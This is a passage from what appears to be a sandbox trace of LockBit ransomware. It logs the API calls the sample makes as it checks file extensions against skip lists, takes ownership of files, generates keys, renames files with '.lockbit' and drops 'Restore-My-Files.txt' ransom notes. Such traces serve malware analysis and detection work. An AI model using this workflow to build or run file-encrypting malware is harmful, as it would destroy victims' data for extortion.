lpString2=".wmv") returned -1 [0089.982] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0089.982] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv.lockbit") returned 91 [0089.982] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0089.990] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0090.002] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0090.004] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0090.005] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0090.005] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0090.005] RtlFreeAnsiString (AnsiString="\\") [0090.005] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x4b4) returned 0x0 [0090.005] malloc (_Size=0x200) returned 0x1fb20c0 [0090.006] NtQueryInformationToken (in: TokenHandle=0x4b4, TokenInformationClass=0x1, TokenInformation=0x1fb20c0, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x1fb20c0, ReturnLength=0x3d6acd8) returned 0x0 [0090.006] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0090.006] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x1fb20c8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0090.006] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0090.006] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0090.007] CloseHandle (hObject=0x4b4) returned 1 [0090.007] free (_Block=0x1fb20c0) [0090.007] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x4b4 [0090.007] CreateIoCompletionPort (FileHandle=0x4b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0090.007] malloc (_Size=0x40068) returned 0x3d70048 [0090.007] GetFileSizeEx (in: hFile=0x4b4, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=1829606) returned 1 [0090.007] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0090.008] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0090.008] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0090.009] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0090.009] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0090.009] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0090.009] ReadFile (in: hFile=0x4b4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0090.815] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0090.815] malloc (_Size=0xcc) returned 0x1ff1e60 [0090.815] NtSetInformationFile (FileHandle=0x4b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xcc, FileInformationClass=0xa) returned 0x0 [0090.816] free (_Block=0x1ff1e60) [0090.816] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports") returned 1 [0090.816] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt") returned 72 [0090.816] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0090.816] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71cbe1bf, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71cbe1bf, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x50393053, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1c0a26, dwReserved0=0x0, dwReserved1=0x0, cFileName="SportsMainToNotesBackground_PAL.wmv", cAlternateFileName="")) returned 1 [0090.816] lstrcmpiW (lpString1=".", lpString2="SportsMainToNotesBackground_PAL.wmv") returned -1 [0090.816] lstrcmpiW (lpString1="..", lpString2="SportsMainToNotesBackground_PAL.wmv") returned -1 [0090.816] PathFindExtensionW (pszPath="SportsMainToNotesBackground_PAL.wmv") returned=".wmv" [0090.816] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0090.816] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0090.816] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0090.817] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0090.817] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0090.817] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0090.817] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0090.817] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0090.817] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0090.817] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0090.817] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0090.817] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0090.817] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0090.817] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0090.817] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0090.817] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0090.817] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0090.817] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0090.817] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0090.817] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0090.817] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0090.817] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0090.817] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0090.817] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0090.817] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0090.817] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0090.818] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0090.818] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0090.818] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0090.818] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0090.818] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0090.818] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0090.818] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0090.818] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0090.818] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0090.818] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0090.818] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0090.818] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0090.818] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0090.818] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0090.818] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0090.818] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0090.818] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0090.818] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0090.818] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0090.818] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0090.818] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0090.818] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SportsMainToNotesBackground_PAL.wmv") returned -1 [0090.819] lstrcmpiW (lpString1="ntldr", lpString2="SportsMainToNotesBackground_PAL.wmv") returned -1 [0090.819] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SportsMainToNotesBackground_PAL.wmv") returned -1 [0090.819] lstrcmpiW (lpString1="bootsect.bak", lpString2="SportsMainToNotesBackground_PAL.wmv") returned -1 [0090.819] lstrcmpiW (lpString1="autorun.inf", lpString2="SportsMainToNotesBackground_PAL.wmv") returned -1 [0090.819] lstrcmpiW (lpString1="thumbs.db", lpString2="SportsMainToNotesBackground_PAL.wmv") returned 1 [0090.819] lstrcmpiW (lpString1="iconcache.db", lpString2="SportsMainToNotesBackground_PAL.wmv") returned -1 [0090.819] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\") returned="" [0090.819] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned=".wmv" [0090.819] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0090.819] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0090.819] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0090.819] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0090.819] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0090.819] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0090.819] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0090.819] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0090.819] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0090.819] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0090.819] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0090.819] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0090.819] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0090.819] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0090.819] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0090.820] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0090.820] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0090.820] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0090.820] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0090.820] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0090.820] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0090.820] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0090.820] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0090.820] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0090.820] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0090.820] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0090.820] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0090.820] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0090.820] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv.lockbit") returned 95 [0090.820] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0090.847] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0090.891] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0090.896] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0090.897] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0090.899] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0090.899] RtlFreeAnsiString (AnsiString="\\") [0090.899] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x4b4) returned 0x0 [0090.899] malloc (_Size=0x200) returned 0x2071008 [0090.899] NtQueryInformationToken (in: TokenHandle=0x4b4, TokenInformationClass=0x1, TokenInformation=0x2071008, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x2071008, ReturnLength=0x3d6acd8) returned 0x0 [0090.899] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0090.899] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x2071010*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0090.899] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0090.900] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0090.900] CloseHandle (hObject=0x4b4) returned 1 [0090.900] free (_Block=0x2071008) [0090.900] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x4b4 [0090.901] CreateIoCompletionPort (FileHandle=0x4b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0090.901] malloc (_Size=0x40068) returned 0x3d70048 [0090.901] GetFileSizeEx (in: hFile=0x4b4, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=1837606) returned 1 [0090.901] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0090.903] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0090.903] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0090.903] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0090.906] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0090.906] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0090.906] ReadFile (in: hFile=0x4b4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0091.040] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0091.040] malloc (_Size=0xd4) returned 0x1ff1e60 [0091.040] NtSetInformationFile (FileHandle=0x4b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xd4, FileInformationClass=0xa) returned 0x0 [0091.048] free (_Block=0x1ff1e60) [0091.048] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports") returned 1 [0091.048] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt") returned 72 [0091.048] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0091.048] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71d7c890, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71d7c890, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x504c3b43, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x184166, dwReserved0=0x0, dwReserved1=0x0, cFileName="SportsMainToScenesBackground.wmv", cAlternateFileName="")) returned 1 [0091.048] lstrcmpiW (lpString1=".", lpString2="SportsMainToScenesBackground.wmv") returned -1 [0091.048] lstrcmpiW (lpString1="..", lpString2="SportsMainToScenesBackground.wmv") returned -1 [0091.048] PathFindExtensionW (pszPath="SportsMainToScenesBackground.wmv") returned=".wmv" [0091.048] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0091.048] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0091.048] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0091.049] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0091.049] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0091.049] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0091.049] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0091.049] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0091.049] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0091.049] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0091.049] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0091.049] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0091.049] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0091.049] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0091.049] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0091.049] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0091.049] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0091.049] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0091.049] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0091.049] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0091.049] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0091.049] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0091.049] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0091.049] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0091.049] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0091.049] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0091.049] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0091.049] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0091.049] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0091.049] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0091.049] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0091.049] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0091.049] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0091.050] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0091.050] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0091.050] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0091.050] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0091.050] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0091.050] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0091.050] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0091.050] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0091.050] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0091.050] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0091.050] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0091.050] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0091.050] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0091.050] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0091.050] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SportsMainToScenesBackground.wmv") returned -1 [0091.050] lstrcmpiW (lpString1="ntldr", lpString2="SportsMainToScenesBackground.wmv") returned -1 [0091.050] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SportsMainToScenesBackground.wmv") returned -1 [0091.050] lstrcmpiW (lpString1="bootsect.bak", lpString2="SportsMainToScenesBackground.wmv") returned -1 [0091.050] lstrcmpiW (lpString1="autorun.inf", lpString2="SportsMainToScenesBackground.wmv") returned -1 [0091.050] lstrcmpiW (lpString1="thumbs.db", lpString2="SportsMainToScenesBackground.wmv") returned 1 [0091.050] lstrcmpiW (lpString1="iconcache.db", lpString2="SportsMainToScenesBackground.wmv") returned -1 [0091.050] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\") returned="" [0091.050] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv") returned=".wmv" [0091.050] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0091.050] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0091.050] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0091.050] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0091.050] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0091.050] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0091.050] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0091.050] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0091.051] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0091.051] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0091.051] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0091.051] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0091.051] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0091.051] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0091.051] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0091.051] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0091.051] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0091.051] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0091.051] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0091.051] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0091.051] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0091.051] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0091.051] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0091.051] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0091.051] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0091.051] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0091.051] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0091.051] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0091.051] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv.lockbit") returned 92 [0091.051] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0091.053] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0091.054] 